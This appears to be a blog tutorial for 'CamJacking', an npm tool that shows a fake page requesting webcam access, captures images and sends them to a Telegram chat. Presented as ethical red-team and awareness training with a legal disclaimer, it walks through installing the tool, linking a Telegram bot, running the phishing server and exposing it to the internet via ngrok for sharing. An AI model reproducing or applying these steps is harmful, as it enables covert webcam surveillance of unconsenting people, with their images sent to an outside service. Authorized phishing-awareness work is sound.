How to Use CamJacking for Ethical Social Engineering Simulations

In this blog, weโ€™ll explore CamJackingโ€”a powerful open-source tool used to simulate webcam-based phishing attacks. Developed for ethical hackers and red teamers, this tool helps test how users respond to camera permission prompts.

What is CamJacking?

CamJacking creates a fake webpage that asks for webcam access. When the user clicks "Allow", the tool captures images via the webcam and sends them to a Telegram chat. This is useful for demonstrating how easily users can be tricked into giving up camera access during phishing attacks.

Step 1: Install CamJacking

CamJacking is available as an npm package. Install it globally using:


    sudo npm install camjacking -g

Step 2: Set Up Telegram Bot

CamJacking sends captured images to Telegram. To set this up:

  • ๐Ÿ’ฌ Open Telegram and search @CappricioSecuritiesTools_bot
  • โ–ถ๏ธ Click "Start"
  • ๐Ÿ“ฅ Note down your Chat ID (visible in the bot reply)

Step 3: Add Your Telegram Chat ID

Before starting CamJacking, make sure you have your Telegram Chat ID ready. Replace <your_telegram_chat_id> in the command below with your actual ID.


    camjacking -c your_telegram_chat_id

Step 4: Start CamJacking


    camjacking -p 80

Now run the command above in your terminal. This will start the CamJacking server locally on port 80.

Step 5: Access the Fake Page

Once CamJacking is running, open http://localhost:80 in your browser. The page will request camera access.

Step 6: Make It Public (Optional)

Use ngrok to expose the page to the internet:


    ngrok http 80

Share the generated link to test it on other devices.

Setup Video (Use earphones for better audio)

Apologies for the audio quality โ€” my microphone wasn't working well during the recording.

Real-World Use Cases

  • ๐Ÿ‘จโ€๐Ÿซ Security Awareness Training: Show employees how easy it is to get tricked into sharing webcam access.
  • ๐Ÿงช Phishing Simulations: Emulate a real-world camera phishing scenario.
  • ๐Ÿ” Red Team Exercises: Capture user behavior when presented with permission prompts.

Legal Disclaimer

โš ๏ธ Use CamJacking only in authorized environments. This tool is meant for educational and ethical hacking purposes. Unauthorized use may be illegal.

GitHub Repository

You can find the official code and updates on:

Cappricio-Securities/camjacking

Conclusion

CamJacking is a simple yet powerful tool to demonstrate how easily trust can be exploited. It's a great resource for red teamers, trainers, and security enthusiasts looking to raise awareness about camera-based phishing attacks.

Thanks for reading! If you found this useful, feel free to share it with your fellow hackers. Stay safe and think before you click! ๐Ÿ’ป๐Ÿ”’